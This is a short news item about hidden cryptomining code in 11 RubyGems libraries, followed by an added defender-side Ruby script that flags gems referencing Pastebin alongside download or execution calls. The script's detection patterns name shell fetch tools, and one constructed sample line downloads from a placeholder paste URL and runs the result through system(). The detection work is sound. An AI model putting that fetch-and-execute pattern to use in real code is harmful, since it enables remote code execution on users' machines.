Hidden cryptojacking code has been discovered on the RubyGems platform in 11 open source libraries that have more than 3,500 downloads.
It is reported that hackers download libraries written in the Ruby programming language, inject malicious code, and then upload them to RubyGems under new names. For example, the doge_coin, coin_base, and blockchain_wallet libraries, which are associated with cryptocurrencies, have been downloaded over a thousand times.
After the user installs such a library, it downloads additional files from the Pastebin website and launches hidden cryptocurrency mining. The malicious library also sends the hacker the IP address of the infected computer and various system parameters, which may contain personal information of the user.
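A defender-side illustration of the behaviour described above, added here and not taken from the report or from RubyGems: a heuristic Ruby audit that flags gem source files referencing Pastebin together with a download or execution call. All names and sample sources are constructed assumptions, and the patterns are a triage aid, not the actual indicators from these libraries.

```ruby
# Added example: heuristic triage of gem source files.
# PASTE_HOST, FETCH, EXEC, audit_source, verdict and audit_gem_dir are
# hypothetical names; SAMPLES holds constructed text, not real malware.

PASTE_HOST = /pastebin\.com/i
FETCH = /\b(?:Net::HTTP|URI\.open|open-uri|curl|wget)\b/
EXEC = /\b(?:eval|system|exec|spawn)\b|IO\.popen/

# Return which indicator classes appear in one source string.
def audit_source(source)
  hits = []
  hits << :paste_host if source.match?(PASTE_HOST)
  hits << :fetch if source.match?(FETCH)
  hits << :exec if source.match?(EXEC)
  hits
end

# A paste-site reference combined with fetching or executing is the pattern
# from the report; a lone reference or fetch+exec only warrants a look.
def verdict(hits)
  paste = hits.include?(:paste_host)
  return :high if paste && (hits.include?(:fetch) || hits.include?(:exec))
  return :review if paste || (hits.include?(:fetch) && hits.include?(:exec))
  :ok
end

# Walk a directory of unpacked gems (for example File.join(Gem.dir, "gems"))
# and return { path => verdict } for every file that is not :ok.
def audit_gem_dir(dir)
  pattern = File.join(dir, "**", "*.{rb,rake,gemspec}")
  Dir.glob(pattern).each_with_object({}) do |path, report|
    v = verdict(audit_source(File.read(path, mode: "rb")))
    report[path] = v unless v == :ok
  end
end

# Constructed sample sources; PLACEHOLDER is not a real paste id.
SAMPLES = {
  "clean.rb" => "require 'json'\nputs JSON.generate(ok: true)\n",
  "docs.rb" => "# see https://pastebin.com/PLACEHOLDER for the log\n",
  "suspicious.rb" => "body = Net::HTTP.get(URI('https://pastebin.com/raw/PLACEHOLDER'))\n" \
                     "system(body)\n"
}

if $PROGRAM_NAME == __FILE__
  SAMPLES.each { |name, src| puts "#{name}: #{verdict(audit_source(src))}" }
end
```

A `:review` or `:high` result is a prompt to read the file, since legitimate gems also make HTTP requests and spawn processes.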
RubyGems users believe that developers of popular libraries need to enable two-factor authentication when they log in to the site, since thousands of computers and users may suffer if a developer's account is hacked and their libraries are replaced.
Recall that the cybersecurity company Varonis recently announced the discovery of a new miner virus, Norman, which hides its presence from the task list.